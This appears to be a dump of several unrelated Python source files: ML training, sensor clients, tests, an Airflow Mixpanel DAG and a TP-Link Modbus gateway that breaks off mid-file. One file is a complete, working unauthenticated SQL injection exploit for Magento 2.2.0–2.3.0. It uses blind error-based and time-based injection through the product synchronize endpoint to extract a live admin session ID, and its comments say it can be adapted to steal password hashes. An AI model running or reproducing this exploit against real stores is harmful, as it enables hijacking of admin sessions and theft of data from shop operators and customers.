        top, bottom = np.clip(cy - half, 0, h), np.clip(cy + half, 0, h)
        left, right = np.clip(cx - half, 0, w), np.clip(cx + half, 0, w)

        mask = np.ones((h, w), np.float32)
        mask[top: bottom, left: right] = 0.
        # Broadcast the 2-D mask across channels and zero the patch in place.
        img *= torch.from_numpy(mask).expand_as(img)
        return img
def log_metrics(expdir: str, filename: str, metrics, test_acc: float, args) -> None:
    """Persist final run results.

    Writes a one-row summary to `<expdir>/<filename>.tsv` and the full
    per-epoch metrics list to `<expdir>/<filename>.yaml`.
    """
    print('filename:', f'test_acc: {test_acc}', metrics[-1])
    results = [
        ('test_acc', test_acc),
        ('val_acc', metrics[-1]['val_top1']),
        ('epochs', args.epochs),
        ('train_batch_size', args.train_batch_size),
        ('test_batch_size', args.test_batch_size),
        ('model_name', args.model_name),
        ('exp_name', args.experiment_name),
        ('exp_desc', args.experiment_description),
        ('seed', args.seed),
        ('devices', utils.cuda_device_names()),
        ('half', args.half),
        ('cutout', args.cutout),
        ('train_acc', metrics[-1]['train_top1']),
        ('loader_workers', args.loader_workers),
        ('date', str(time.time())),
    ]
    # FIX: output stems previously used a hard-coded '(unknown)' literal,
    # ignoring the `filename` argument so every run overwrote the same files.
    utils.append_csv_file(os.path.join(expdir, f'{filename}.tsv'), results)
    with open(os.path.join(expdir, f'{filename}.yaml'), 'w') as f:
        yaml.dump(metrics, f)
def create_crit(device, half):
    """Build a cross-entropy criterion on `device`, cast to fp16 when `half`."""
    criterion = nn.CrossEntropyLoss().to(device)
    # Module.half() converts in place and returns the same module.
    return criterion.half() if half else criterion
def create_model(model_name, device, half) -> nn.Module:
    """Instantiate `model_name` from cifar10_models on `device` (fp16 if `half`)."""
    model_class = getattr(cifar10_models, model_name)
    net = model_class()
    logging.info(f'param_size_m={param_size(net):.1e}')
    net = net.to(device)
    if half:
        net.half()  # in-place conversion; return value is the same module
    return net
def main():
    """CLI entry point: parse args, set up output/data dirs and logging,
    then train a CIFAR-10 model and log final metrics."""
    parser = argparse.ArgumentParser(description='Pytorch cifar training')
    parser.add_argument('--experiment-name', '-n', default='train_pytorch')
    parser.add_argument('--experiment-description', '-d',
                        default='Train cifar usin pure PyTorch code')
    parser.add_argument('--epochs', '-e', type=int, default=1)
    parser.add_argument('--model-name', '-m', default='resnet34')
    parser.add_argument('--device', default='',
                        help='"cuda" or "cpu" or "" in which case use cuda if available')
    parser.add_argument('--train-batch-size', '-b', type=int, default=128)
    parser.add_argument('--test-batch-size', type=int, default=4096)
    parser.add_argument('--seed', '-s', type=float, default=42)
    parser.add_argument('--half', type=lambda x: x.lower() == 'true',
                        nargs='?', const=True, default=False)
    parser.add_argument('--cutout', type=int, default=0)
    parser.add_argument('--grad-clip', type=float, default=5.0)
    parser.add_argument('--datadir', default='',
                        help='where to find dataset files, default is ~/torchvision_data_dir')
    parser.add_argument('--outdir', default='',
                        help='where to put results, default is ~/logdir')
    parser.add_argument('--loader-workers', type=int, default=-1,
                        help='number of thread/workers for data loader (-1 means auto)')
    args = parser.parse_args()
    # Fall back to cluster-provided env vars, then to home-dir defaults.
    if not args.datadir:
        args.datadir = os.environ.get('PT_DATA_DIR', '') or '~/dataroot'
    if not args.outdir:
        args.outdir = os.environ.get('PT_OUTPUT_DIR', '')
    if not args.outdir:
        args.outdir = os.path.join(
            '~/logdir', 'cifar_testbed', args.experiment_name)
    expdir = utils.full_path(args.outdir)
    os.makedirs(expdir, exist_ok=True)
    utils.setup_cuda(args.seed)
    datadir = utils.full_path(args.datadir)
    os.makedirs(datadir, exist_ok=True)
    utils.create_logger(filepath=os.path.join(expdir, 'logs.log'))
    # log config for reference
    logging.info(
        f'exp_name="{args.experiment_name}", exp_desc="{args.experiment_description}"')
    logging.info(
        f'model_name="{args.model_name}", seed={args.seed}, epochs={args.epochs}')
    logging.info(f'half={args.half}, cutout={args.cutout}')
    logging.info(f'datadir="{datadir}"')
    logging.info(f'expdir="{expdir}"')
    logging.info(f'train_batch_size={args.train_batch_size}')
    if args.device:
        device = torch.device(args.device)
    else:
        device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
    # load data just before train start so any errors so far is not delayed
    train_dl, val_dl, test_dl = get_data(datadir=datadir,
                                         train_batch_size=args.train_batch_size, test_batch_size=args.test_batch_size,
                                         train_num_workers=args.loader_workers, test_num_workers=args.loader_workers,
                                         cutout=args.cutout)
    epochs = args.epochs
    net = create_model(args.model_name, device, args.half)
    crit = create_crit(device, args.half)
    optim, sched, sched_on_epoch = optim_sched_orig(net, epochs)
    train_metrics = train(epochs, train_dl, val_dl, net, device, crit, optim,
                          sched, sched_on_epoch, args.half, False, grad_clip=args.grad_clip)
    test_acc = test(net, test_dl, device, args.half)
    log_metrics(expdir, 'train_metrics', train_metrics, test_acc, args)
# Script entry point: run training when executed directly.
if __name__ == '__main__':
    main()
| 2.046875 | 2 |
connectsensor/tank.py | masaccio/kingspan-connect-sensor | 1 | 12760983 | <filename>connectsensor/tank.py
from zeep.helpers import serialize_object
import pandas as pd
import sqlite3
import ssl
import sys
class DBError(Exception):
    """Raised when the history cache database cannot be opened or queried."""
    pass
class Tank:
    """A single tank reachable through a SensAlarm/Connect API client.

    Wraps level queries, tank metadata lookups, and level-history retrieval
    (optionally cached in a local sqlite database).
    """

    def __init__(self, client, tank_info):
        self._client = client
        self._tank_info = tank_info

    def level(self):
        """Fetch the latest level reading as a dict.

        Side effect: caches the tank-info items used by the metadata getters.
        """
        response = self._client.get_latest_level(self._tank_info["SignalmanNo"])
        self._tank_info_items = response["TankInfo"]["APITankInfoItem"]
        level_data = response["Level"]
        return dict(serialize_object(level_data))

    def _lookup_tank_info_item(self, item_name):
        """Return the value of the named tank-info item, or None if absent."""
        if not hasattr(self, "_tank_info_items"):
            self.level()  # lazily populate the info items via an API call
        for item in self._tank_info_items:
            if item["Name"] == item_name:
                return item["Value"]
        return None

    def serial_number(self):
        """Tank serial number, or None if not reported."""
        return self._lookup_tank_info_item("Serial No")

    def model(self):
        """Tank model string, or None if not reported."""
        return self._lookup_tank_info_item("Model")

    def name(self):
        """User-assigned tank name, or None if not reported."""
        return self._lookup_tank_info_item("Tank Name")

    def capacity(self):
        """Tank capacity in litres, or None if not reported."""
        return self._lookup_tank_info_item("Tank Capacity(L)")

    def history(self):
        """Return the level history as a DataFrame with columns
        reading_date / level_percent / level_litres."""
        history_data = self._client.get_history(self._tank_info["SignalmanNo"])
        df = pd.DataFrame(serialize_object(history_data))
        df = df[["ReadingDate", "LevelPercentage", "LevelLitres"]]
        df.columns = ["reading_date", "level_percent", "level_litres"]
        return df

    def cached_history(self, cache_db, update=False):
        """Merge fresh history with rows cached in the sqlite file `cache_db`.

        When `update` is True the merged table is written back. Raises DBError
        if the database cannot be opened.
        """
        try:
            conn = sqlite3.connect(cache_db)
            cur = conn.cursor()
        # FIX: was `except Error`, an undefined name that raised NameError
        # instead of the intended DBError.
        except sqlite3.Error as e:
            raise DBError(f"{cache_db}: connection failed") from e
        new_history = self.history()
        if _table_exists(cur):
            query = "SELECT * FROM history;"
            old_history = pd.read_sql_query(query, conn, parse_dates=["reading_date"])
            # FIX: DataFrame.append was deprecated and removed in pandas 2.0.
            history = pd.concat([old_history, new_history]).drop_duplicates()
        else:
            # FIX: previously `history` could be unbound when no cache table
            # existed yet; fall back to the freshly fetched data.
            history = new_history
        if update:
            history.to_sql("history", conn, if_exists="replace", index=False)
        cur.close()
        conn.close()
        return history
def _table_exists(cur):
query = "SELECT name FROM sqlite_master WHERE type='table' AND name='history'"
try:
cur.execute(query)
rows = cur.fetchall()
except Error as e:
raise DBError("Failed to check status of history table") from e
return len(rows) > 0
| 2.59375 | 3 |
scripts/mapping-test.py | mwinding/play | 0 | 12760984 | # %%
# test out geopy
import os
os.chdir(os.path.dirname(os.getcwd())) # make directory one step up the current directory
from geopy.geocoders import Nominatim
geolocator = Nominatim(user_agent='<PASSWORD>_agent')
location = geolocator.geocode('175 5th Avenue NYC')
print(location.address)
print((location.latitude, location.longitude))
#print(location.raw)
# %%
# test out python maps
import folium
m = folium.Map(location=[location.latitude, location.longitude], zoom_start=13)
m.save('outputs/test-map.html')
# %%
| 2.890625 | 3 |
gym_forest/envs/__init__.py | kmckiern/gym-forest | 2 | 12760985 | from gym_forest.envs.gym_forest import ForestDiscreteEnv
| 1.125 | 1 |
exploit/webapp/cms/magento-sqli.py | prismaB/exxer | 6 | 12760986 | #!/usr/bin/env python3
# Magento 2.2.0 <= 2.3.0 Unauthenticated SQLi
# <NAME>
# 2019-03-22
#
# SOURCE & SINK
# The sink (from-to SQL condition) has been present from Magento 1.x onwards.
# The source (/catalog/product_frontend_action/synchronize) from 2.2.0.
# If your target runs Magento < 2.2.0, you need to find another source.
#
# SQL INJECTION
# The exploit can easily be modified to obtain other stuff from the DB, for
# instance admin/user password hashes.
#
import requests
import string
import binascii
import re
import random
import time
import sys
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def run(url):
sqli = SQLInjection(url)
try:
sqli.find_test_method()
sid = sqli.get_most_recent_session()
except ExploitError as e:
print('Error: %s' % e)
def random_string(n=8):
return ''.join(random.choice(string.ascii_letters) for _ in range(n))
class ExploitError(Exception):
pass
class Browser:
"""Basic browser functionality along w/ URLs and payloads.
"""
PROXY = None
def __init__(self, URL):
self.URL = URL
self.s = requests.Session()
self.s.verify = False
if self.PROXY:
self.s.proxies = {
'http': self.PROXY,
'https': self.PROXY,
}
class SQLInjection(Browser):
"""SQL injection stuff.
"""
def encode(self, string):
return '0x' + binascii.b2a_hex(string.encode()).decode()
def find_test_method(self):
"""Tries to inject using an error-based technique, or falls back to timebased.
"""
for test_method in (self.test_error, self.test_timebased):
if test_method('123=123') and not test_method('123=124'):
self.test = test_method
break
else:
raise ExploitError('Test SQL injections failed, not vulnerable ?')
def test_timebased(self, condition):
"""Runs a test. A valid condition results in a sleep of 1 second.
"""
payload = '))) OR (SELECT*FROM (SELECT SLEEP((%s)))a)=1 -- -' % condition
r = self.s.get(
self.URL + '/catalog/product_frontend_action/synchronize',
params={
'type_id': 'recently_products',
'ids[0][added_at]': '',
'ids[0][product_id][from]': '?',
'ids[0][product_id][to]': payload
}
)
return r.elapsed.total_seconds() > 1
def test_error(self, condition):
"""Runs a test. An invalid condition results in an SQL error.
"""
payload = '))) OR (SELECT 1 UNION SELECT 2 FROM DUAL WHERE %s) -- -' % condition
r = self.s.get(
self.URL + '/catalog/product_frontend_action/synchronize',
params={
'type_id': 'recently_products',
'ids[0][added_at]': '',
'ids[0][product_id][from]': '?',
'ids[0][product_id][to]': payload
}
)
if r.status_code not in (200, 400):
raise ExploitError(
'SQL injection does not yield a correct HTTP response'
)
return r.status_code == 400
def word(self, name, sql, size=None, charset=None):
"""Dichotomically obtains a value.
"""
pattern = 'LOCATE(SUBSTR((%s),%d,1),BINARY %s)=0'
full = ''
check = False
if size is None:
# Yeah whatever
size_size = self.word(
name,
'LENGTH(LENGTH(%s))' % sql,
size=1,
charset=string.digits
)
size = self.word(
name,
'LENGTH(%s)' % sql,
size=int(size_size),
charset=string.digits
)
size = int(size)
print("%s: %s" % (name, full), end='\r')
for p in range(size):
c = charset
while len(c) > 1:
middle = len(c) // 2
h0, h1 = c[:middle], c[middle:]
condition = pattern % (sql, p+1, self.encode(h0))
c = h1 if self.test(condition) else h0
full += c
print("%s: %s" % (name, full), end='\r')
print(' ' * len("%s: %s" % (name, full)), end='\r')
return full
def get_most_recent_session(self):
"""Grabs the last created session. We don't need special privileges aside from creating a product so any session
should do. Otherwise, the process can be improved by grabbing each session one by one and trying to reach the
backend.
"""
# This is the default admin session timeout
session_timeout = 900
query = (
'SELECT %%s FROM admin_user_session '
'WHERE TIMESTAMPDIFF(SECOND, updated_at, NOW()) BETWEEN 0 AND %d '
'ORDER BY created_at DESC, updated_at DESC LIMIT 1'
) % session_timeout
# Check if a session is available
available = not self.test('(%s)=0' % (query % 'COUNT(*)'))
if not available:
raise ExploitError('No session is available')
print('An admin session is available !')
# Fetch it
sid = self.word(
'Session ID',
query % 'session_id',
charset=string.ascii_lowercase + string.digits,
size=26
)
print('Session ID: %s' % sid)
return sid
run(sys.argv[1])
| 2.140625 | 2 |
calliope/test/test_io.py | sjpfenninger/calliope | 1 | 12760987 | import os
import tempfile
import numpy as np
import pytest
import calliope
def verify_solution_integrity(model_solution, solution_from_disk, tempdir):
    """Assert that a solution read back from disk matches the in-memory one."""
    # FIX: np.allclose's result was previously discarded, so a numeric
    # mismatch between the two solutions could never fail the test.
    assert np.allclose(model_solution['e_cap'], solution_from_disk['e_cap'])
    # Check that config AttrDict has been deserialized
    assert(solution_from_disk.attrs['config_run'].output.path == tempdir)
class TestSave:
    """Round-trip tests: solve a model once, save the solution in each
    supported format, read it back and verify integrity."""
    @pytest.fixture(scope='module')
    def model(self):
        # One solved model shared by all tests in this module (solving is slow).
        model = calliope.Model()
        model.run()
        return model

    def test_save_netcdf(self, model):
        with tempfile.TemporaryDirectory() as tempdir:
            model.config_run.set_key('output.path', tempdir)
            model.save_solution('netcdf')
            # Try reading solution back in
            sol_file = os.path.join(tempdir, 'solution.nc')
            solution_from_disk = calliope.read.read_netcdf(sol_file)
            solution_from_disk.close()  # so that temp dir can be deleted
            verify_solution_integrity(model.solution, solution_from_disk, tempdir)

    def test_save_csv(self, model):
        with tempfile.TemporaryDirectory() as tempdir:
            model.config_run.set_key('output.path', tempdir)
            model.save_solution('csv')
            # Try reading solution back in
            solution_from_disk = calliope.read.read_csv(tempdir)
            verify_solution_integrity(model.solution, solution_from_disk, tempdir)
| 2.34375 | 2 |
pyiacsun/atlas/Delbouille73.py | aasensio/pyiacsun | 5 | 12760988 | <reponame>aasensio/pyiacsun
# <EMAIL>
def Delbouille73(ini, endi, atlasdir=None):
    """
    Extract spectral data from the original disk-center
    intensity atlas recorded at the Jungfraujoch Observatory:
    Delbouille, Neven, Roland (1973)

    Wavelength range: 3000 - 10.000 A
    Wavelength step (visible): 0.002 A

    CALL: atlas,xlam = Delbouille73(ini = waveIni ,endi = waveEndi)

    Downloaded from:
    http://bass2000.obspm.fr/solar_spect.php

    Args:
        ini (int): Initial wavelength
        endi (int): Final wavelength
        atlasdir (string, optional): Atlas directory

    Returns:
        list: [intensity normalized by 1e4, wavelength array in Angstrom]
    """
    import numpy as np
    # Atlas directory
    if atlasdir is None:
        # Default: the package 'data' directory, two path levels above this file.
        atlasdir = str(__file__).split('/')
        sdir = '/'.join(atlasdir[0:-2])+'/data'
    else:
        sdir = atlasdir
    # NOTE: loads the full atlas into memory on every call.
    file0 = np.load(sdir + '/Delbouille73.npy')
    # Wavelength grid matching the stored samples (0.002 A step).
    lmbda0 = np.arange(3000., 10000., 0.002)
    # Nearest grid indices for the requested window.
    iniI = np.argmin(abs(ini - lmbda0))
    endiI = np.argmin(abs(endi - lmbda0))
    lmbda = lmbda0[iniI:endiI]
    varFinal = file0[iniI:endiI]
    return [varFinal / 1e4, lmbda]
if __name__ == '__main__':
    # Quick visual smoke test: plot a short, peak-normalized atlas slice.
    import matplotlib.pyplot as plt
    [atlas, xlam] = Delbouille73(ini=6300, endi=6303)
    plt.plot(xlam, atlas / max(atlas))
    plt.title('Delbouille73 Atlas')
    plt.xlabel('Wavelength [A]')
    plt.ylim(0., 1.)
    plt.show()
| 2.640625 | 3 |
tests/test_gpsfun.py | vincentdavis/gpsfun | 0 | 12760989 | <filename>tests/test_gpsfun.py<gh_stars>0
#!/usr/bin/env python
"""Basic functional Tests for `gpsfun` package."""
import pytest
import unittest
from pathlib import Path
from gpsfun.readers import tcx, gpx, gpsbabel
from gpsfun.tracks import Track
from gpsfun.rallystyle import RallyResults
@pytest.fixture
def all_files():
    """All regression-test input files (names starting 'test_') under test_data/."""
    data_dir = Path(__file__).parent / 'test_data'
    return [entry for entry in data_dir.glob('**/*')
            if entry.is_file() and entry.name[:5] == 'test_']
def test_gpsbabel_basic(all_files):
    """gpsbabel() should parse every supported track format from a file path."""
    for f in all_files:
        if f.suffix in ['.tcx', '.gpx', '.fit']:
            df = gpsbabel(str(f))
            # The parsed frame must expose at least these three columns.
            assert {'Latitude', 'Longitude', 'Date_Time'}.intersection(set(df.columns)) == \
                {'Latitude', 'Longitude', 'Date_Time'}, f"failing file: {str(f)}"
def test_gpsbabel_compressed(all_files):
    """gpsbabel() should transparently handle gzip/zip-compressed tracks."""
    files = [x for x in all_files if x.suffix in ['.gz', '.zip']]
    for f in files:
        df = gpsbabel(str(f))
        assert {'Latitude', 'Longitude', 'Date_Time'}.intersection(set(df.columns)) == \
            {'Latitude', 'Longitude', 'Date_Time'}, f"failing file: {str(f)}"
def test_gpsbabel_stream(all_files):
    """gpsbabel() should accept an open binary stream, not just a path."""
    files = [x for x in all_files if x.suffix in ['.tcx', '.gpx', '.fit']]
    for path in files:
        # FIX: the loop previously rebound `f` (the Path) to the open file
        # object, so the failure message printed the stream repr instead of
        # the offending file's name.
        with open(path, 'rb') as stream:
            df = gpsbabel(stream)
        assert {'Latitude', 'Longitude', 'Date_Time'}.intersection(set(df.columns)) == \
            {'Latitude', 'Longitude', 'Date_Time'}, f"failing file: {str(path)}"
def test_gpx_tracks(all_files):
    """
    uses gpx not gpsbabel
    """
    # Guard against a silently-empty fixture: no files means nothing is tested.
    assert len(all_files) > 0
    for f in all_files:
        if f.suffix == '.gpx':
            t = Track(df=gpx(f))
            t.elevation()
            assert t.avg_elevation != 0, f"failing file: {str(f)}"
            t.distance()
            assert t.total_distance > 0, f"failing file: {str(f)}"
            t.time()
            assert t.start_time < t.end_time, f"failing file: {str(f)}"
def test_tcx_tracks(all_files):
    '''
    uses tcx not gpsbabel
    '''
    for f in all_files:
        if f.suffix == '.tcx':
            t = Track(df=tcx(f))
            t.elevation()
            # NOTE: >= 0 here (vs != 0 in the gpx test) — TCX samples may
            # legitimately report zero elevation.
            assert t.avg_elevation >= 0, f"failing file: {str(f)}"
            t.distance()
            assert t.total_distance > 0, f"failing file: {str(f)}"
            t.time()
            assert t.start_time < t.end_time, f"failing file: {str(f)}"
@pytest.fixture
def roubaix():
    """Course definition for the roubaix rally: checkpoints in ride order."""
    return [{'Segment_name':'Ride Start: lap 1',
             'location': {'lat': 40.117348, 'lon': -105.258836},
             'type_name': 'transport',
             'type_args': {'timed': None}
             },
            {'Segment_name':'End lap 1, Refuel, ride to start',
             'location': {'lat': 40.116263, 'lon': -105.257817},
             'type_name': 'transport',
             'type_args': {'timed': None},
             },
            {'Segment_name':'Race: Lap two',
             'location': {'lat': 40.117348, 'lon': -105.258836},
             'type_name': 'timed',
             'type_args': None,
             },
            {'Segment_name':'Finish',
             'location': {'lat': 40.116263, 'lon': -105.257817},
             # NOTE(review): this entry uses key 'type' while the others use
             # 'type_name' — confirm against RallyResults' expected schema.
             'type': 'end'
             }
            ]
@pytest.fixture
def rally_files():
    """Collect the GPS logs for the roubaix rally test course.

    Bug fix: Path.suffix includes the leading dot (e.g. '.gpx'), so the
    original comparison against ['gpx', 'fit', 'tcx'] matched nothing and
    the fixture always returned an empty list (silently skipping the test).
    """
    parent_dir = Path(__file__).parent
    p = parent_dir.joinpath('test_data/rallystyle/roubaix').glob('**/*')
    return [x for x in p if x.is_file() and x.suffix.lower() in ['.gpx', '.fit', '.tcx']]
def test_rallystyle_basic(rally_files, roubaix):
    """Run the full rally pipeline (parse -> checkpoints -> results) per file."""
    for path in rally_files:
        results = RallyResults(df=Track(gpsbabel(str(path))).df, segments=roubaix)
        try:
            results.match_checkpoints()
        except Exception:
            # Fix: was a bare `except:`; catch Exception so KeyboardInterrupt
            # and friends pass through untouched.  Name the offending file
            # before propagating the failure.
            print(path.name)
            raise
        results.calc_results()
if __name__ == '__main__':
    # Bug fix: the tests in this module are plain pytest functions, so
    # unittest.main() would discover nothing.  Delegate to pytest instead.
    raise SystemExit(pytest.main([__file__]))
| 2.4375 | 2 |
airflow/kite_airflow/dags/mixpanel_ingest.py | kiteco/kiteco-public | 17 | 12760990
import datetime
import io
import gzip
import json
import time
from airflow import DAG
from airflow.contrib.operators.aws_athena_operator import AWSAthenaOperator
from airflow.hooks.S3_hook import S3Hook
from airflow.operators.python_operator import PythonOperator
from airflow.models import Variable
import pytz
import requests
import yaml
from jinja2 import PackageLoader
import pkg_resources
from kite_airflow.slack_alerts import task_fail_slack_alert
# Defaults applied to every task in this DAG.
default_args = {
    'owner': 'airflow',
    'depends_on_past': False,
    'start_date': datetime.datetime(2020, 1, 1),
    'email_on_failure': False,
    'email_on_retry': False,
    'retries': 1,
    'retry_delay': datetime.timedelta(minutes=5),
    # Post to Slack whenever a task fails.
    'on_failure_callback': task_fail_slack_alert,
}
# Daily ingest of Mixpanel people-profile deltas, run at 04:10.
dag = DAG(
    'mixpanel_ingest',
    default_args=default_args,
    description='Mixpanel data ingest DAG.',
    schedule_interval='10 4 * * *',
    max_active_runs=1,
    jinja_environment_kwargs={
        # Resolve templated queries (athena/queries/...) from package data.
        'loader': PackageLoader('kite_airflow', 'templates')
    },
)
# Mixpanel stores people timestamps in US Pacific time.
pacific = pytz.timezone('America/Los_Angeles')
# Column schema for the Athena people tables, shared by several operators.
people_schema = yaml.load(pkg_resources.resource_stream('kite_airflow', 'files/mixpanel_people.schema.yaml'), Loader=yaml.FullLoader)
def copy_profile_deltas(task_instance, execution_date, prev_execution_date_success, next_execution_date, **context):
    """Fetch Mixpanel people profiles updated since the last successful run
    and write them, gzipped and newline-delimited, to S3.

    Profiles are pulled via the Mixpanel JQL API in 4-hour windows so each
    request stays small.
    """
    # Window start: the day of this run, or the day after the last success.
    ex_day = execution_date.replace(hour=0, minute=0, second=0, microsecond=0)
    if prev_execution_date_success:
        ex_day = prev_execution_date_success.replace(hour=0, minute=0, second=0, microsecond=0) + datetime.timedelta(days=1)
    next_ex_day = next_execution_date.replace(hour=0, minute=0, second=0, microsecond=0)
    # Chunk boundaries every 4 hours from ex_day up to (at least) next_ex_day.
    chunks = [ex_day]
    while chunks[-1] < next_ex_day:
        chunks.append(chunks[-1] + datetime.timedelta(hours=4))
    gz_file = io.BytesIO()
    with gzip.GzipFile(fileobj=gz_file, mode="w") as f:
        start_date = chunks.pop(0)
        for chunk in chunks:
            # Select profiles whose `time` falls in [start_date, chunk),
            # expressed as epoch-milliseconds.
            filters = []
            for cmp, dt in [['>=', start_date], ['<', chunk]]:
                # NOTE(review): time.mktime() interprets the tuple in the
                # *host's* local zone, not Pacific -- confirm the server TZ.
                filters.append('user.time {} {}'.format(cmp, 1000 * int(time.mktime(dt.astimezone(pacific).timetuple()))))
            start_date = chunk
            print(filters)
            script = 'function main() {{ return People().filter(function(user) {{ return {}; }})}}'.format(' && '.join(filters))
            res = requests.post('https://mixpanel.com/api/2.0/jql',
                                auth=(Variable.get('mixpanel_credentials', deserialize_json=True)['secret'], ''),
                                data={'script': script})
            if res.status_code != 200:
                raise Exception(res.text)
            for line in res.json():
                # Scrub each profile in place: drop empty dicts/lists and
                # strip Mixpanel's '$' prefix from keys, recursively.
                to_scrub = [line]
                while to_scrub:
                    curr = to_scrub.pop(0)
                    for key, value in list(curr.items()):
                        if isinstance(value, (dict, list)) and len(value) == 0:
                            del curr[key]
                        if isinstance(value, dict):
                            to_scrub.append(value)
                        if key.startswith('$'):
                            curr[key[1:]] = value
                            del curr[key]
                for ts_field in ['last_seen', 'time']:
                    # Convert ms timestamps (Pacific) to UTC epoch seconds.
                    # NOTE(review): .replace(tzinfo=pacific) attaches a pytz
                    # zone without DST normalization (yields the LMT offset);
                    # pytz recommends pacific.localize(...) -- confirm intent.
                    pacific_ts = datetime.datetime.fromtimestamp(line[ts_field] / 1000).replace(tzinfo=pacific)
                    line[ts_field] = int(time.mktime(pacific_ts.astimezone(pytz.utc).timetuple()))
                f.write(json.dumps(line).encode('utf8'))
                f.write(b'\n')
    # One gzipped deltas file per execution day, partitioned for Athena.
    s3 = S3Hook('aws_us_east_1')
    key = 'mixpanel/people/raw/year={}/month={}/day={}/deltas.json.gz'.format(
        execution_date.year, execution_date.month, execution_date.day
    )
    s3.load_bytes(gz_file.getvalue(), key, 'kite-metrics')
PythonOperator(
python_callable=copy_profile_deltas,
task_id=copy_profile_deltas.__name__,
dag=dag,
retries=2,
provide_context=True,
) >> AWSAthenaOperator(
aws_conn_id='aws_us_east_1',
task_id='rollup_people',
query='athena/queries/mixpanel_people_rollup.tmpl.sql',
output_location='s3://kite-metrics-test/athena-results/ddl',
database='kite_metrics',
dag=dag,
params={'schema': people_schema},
) >> AWSAthenaOperator(
aws_conn_id='aws_us_east_1',
task_id='cleanup_rollup_table',
query="DROP TABLE mixpanel_people_rollup_{{ds_nodash}}",
output_location='s3://kite-metrics-test/athena-results/ddl',
database='kite_metrics',
dag=dag,
params={'schema': people_schema},
) >> AWSAthenaOperator(
aws_conn_id='aws_us_east_1',
task_id='update_people_table_location',
query="""ALTER TABLE mixpanel_people
SET LOCATION 's3://kite-metrics/mixpanel/people/rollups/year={{execution_date.year}}/month={{execution_date.month}}/day={{execution_date.day}}/'""",
output_location='s3://kite-metrics-test/athena-results/ddl',
database='kite_metrics',
dag=dag,
params={'schema': people_schema},
)
# Manually-triggered DAG that (re)creates the Athena table definitions.
ddl_dag = DAG(
    'mixpanel_ingest_schema_update',
    default_args=default_args,
    description='Mixpanel data schema definition.',
    schedule_interval=None,
    max_active_runs=1,
)
# For each people table: drop it, then recreate it from the shared template.
for table_name, s3_prefix in {'mixpanel_people_raw': 'mixpanel/people/raw', 'mixpanel_people': 'mixpanel/people/rollups'}.items():
    AWSAthenaOperator(
        aws_conn_id='aws_us_east_1',
        task_id='drop_{}'.format(table_name),
        query='DROP TABLE {{params.table_name}}',
        output_location='s3://kite-metrics-test/athena-results/ddl',
        database='kite_metrics',
        dag=ddl_dag,
        params={'table_name': table_name},
    ) >> AWSAthenaOperator(
        aws_conn_id='aws_us_east_1',
        task_id='create_{}'.format(table_name),
        query='athena/tables/mixpanel_people.tmpl.sql',
        output_location='s3://kite-metrics-test/athena-results/ddl',
        database='kite_metrics',
        dag=ddl_dag,
        params={
            'schema': people_schema,
            'table_name': table_name,
            's3_prefix': s3_prefix,
            # Only the raw table is partitioned and stored as JSON.
            'partitioned': table_name == 'mixpanel_people_raw',
            'json': table_name == 'mixpanel_people_raw',
        }
    )
| 1.8125 | 2 |
modbusgwudp.py | andycranston/hs100110-modbusgw | 0 | 12760991
#! /usr/bin/python3
#
# @(!--#) @(#) modbusgwudp.py, version 003, 02-july-2018
#
# modbus gateway over UDP for a TP-Link HS100/HS110 Smart WiFi Plug
#
# Links
#
# https://www.softscheck.com/en/reverse-engineering-tp-link-hs110/
# https://github.com/softScheck/tplink-smartplug
# https://github.com/softScheck/tplink-smartplug/blob/master/tplink-smartplug.py
# https://unserver.xyz/modbus-guide/
#
#
# imports
#
import argparse
import os
import socket
import struct
import sys
########################################################################
DEFAULT_MODBUS_PORT = "8502"
MAX_PACKET_LENGTH = 1024
GETSYSINFO = '{"system":{"get_sysinfo":{}}}'
SETRELAYON = '{"system":{"set_relay_state":{"state":1}}}'
SETRELAYOFF = '{"system":{"set_relay_state":{"state":0}}}'
########################################################################
def showpacket(bytes):
    """Hex-dump a packet to stdout, 16 bytes per row, offset-prefixed.

    (The parameter keeps its historical name `bytes`, shadowing the builtin,
    to preserve the public interface.)
    """
    bpr = 16  # bpr is Bytes Per Row
    if len(bytes) == 0:
        print("<empty frame>")
        return
    for offset, value in enumerate(bytes):
        if offset % bpr == 0:
            print("{:04d} :".format(offset), sep='', end='')
        print(" {:02X}".format(value), sep='', end='')
        if (offset + 1) % bpr == 0:
            print()
    if len(bytes) % bpr != 0:
        print()
    return
########################################################################
def encrypt(barray):
    """XOR-autokey encrypt a TP-Link smart-plug command for TCP transport.

    Each payload byte is XORed with the previous ciphertext byte (seed 171).
    Bug fix: the TP-Link TCP protocol on port 9999 prefixes the payload with
    its length as a 4-byte big-endian integer; the original left the header
    zeroed, which does not match the reference protocol.
    """
    key = 171
    result = bytearray(len(barray) + 4)
    result[0:4] = struct.pack('>I', len(barray))
    i = 4
    for b in barray:
        a = key ^ b
        key = a
        result[i] = a
        i += 1
    return result
########################################################################
def decrypt(barray):
    """Invert encrypt(): XOR each byte with the previous *ciphertext* byte,
    starting from the fixed seed 171."""
    key = 171
    result = bytearray(len(barray))
    for i, b in enumerate(barray):
        result[i] = key ^ b
        key = b
    return result
########################################################################
def runplugcommand(ipaddr, command):
    """Send one JSON command to the plug on TCP port 9999 and return the
    decrypted reply payload (the 4-byte length header is stripped).

    Fix: the socket is now managed by a with-block, so it is closed even
    when connect/send/recv raises (the original leaked it on error).
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as tcp:
        tcp.connect((ipaddr, 9999))
        tcp.send(encrypt(bytearray(command, 'utf-8')))
        plugdata = tcp.recv(MAX_PACKET_LENGTH)
    return decrypt(plugdata[4:])
########################################################################
def getrelaystatus(ipaddr):
    """Return the plug's relay state: 0 (off), 1 (on), or None if the
    sysinfo reply contains neither marker."""
    sysinfo = runplugcommand(ipaddr, '{"system":{"get_sysinfo":{}}}')
    off_marker = bytearray('","relay_state":0,', 'utf-8')
    on_marker = bytearray('","relay_state":1,', 'utf-8')
    if off_marker in sysinfo:
        return 0
    if on_marker in sysinfo:
        return 1
    return None
########################################################################
def setrelaystatus(ipaddr, status):
    """Turn the plug's relay off (status == 0) or on (anything else)."""
    cmd = SETRELAYOFF if status == 0 else SETRELAYON
    runplugcommand(ipaddr, cmd)
########################################################################
#
# Main
#
progname = os.path.basename(sys.argv[0])
# Command line: the plug's IP address and the UDP port to serve Modbus on.
parser = argparse.ArgumentParser()
parser.add_argument("--ipaddr", help="IP address of the HS100/HS110 plug")
